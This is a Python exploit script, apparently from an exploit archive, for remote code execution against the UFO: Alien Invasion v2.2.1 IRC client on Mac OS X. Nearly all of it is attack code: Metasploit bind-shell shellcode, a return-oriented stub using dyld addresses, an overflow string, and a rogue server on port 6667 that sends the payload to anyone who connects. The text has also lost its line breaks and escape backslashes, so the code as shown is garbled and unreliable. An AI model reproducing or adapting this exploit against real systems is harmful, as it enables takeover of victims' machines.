ufoalien-exec.txt
Posted on 29 June 2010
#!/usr/bin/python # # UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX # Author: dookie # Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013 # import sys, socket, struct # msfpayload osx/x86/vforkshell_bind_tcp R | msfencode -b 'x00x0ax0d' -t c shellcode = "x90" * 16 shellcode += ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1" "x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06" "xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6" "x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d" "xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c" "x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f" "x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82" "xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee" "xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1" "x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6" "x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32" "x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45") #### Exec Payload From Heap Stub (By Dino Dai Zovi) #### frag0 = "x90x58x61xc3" frag1 = "x90x58x89xe0x83xc0x0cx89x44x24x08xc3" writeable = 0x8fe66448 # writeable memory location in /usr/lib/dyld setjmp = 0x8fe1cf38 # t _setjmp in /usr/lib/dyld strdup = 0x8fe210dc # t _strdup in /usr/lib/dyld jmpeax = 0x8fe01041 # jmp eax in /usr/lib/dyld stub = frag0 + struct.pack('<III',setjmp,writeable+32,writeable) + \nfrag1 + 'A' * 20 + struct.pack('<IIIII',setjmp,writeable+24,writeable,strdup,jmpeax) + \n'A' * 4 sploit = "001 :" sploit += "x41" * 524 sploit += stub sploit += shellcode sploit += "x0dx0a" #sploit = lead s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', 6667)) s.listen(1) print ("[*] Listening on port 6667.") print ("[*] Have someone connect to you.") print ("[*] Type <control>-c to exit.") conn, addr = s.accept() print '[*] Received connection from: ', addr conn.send(sploit) conn.close
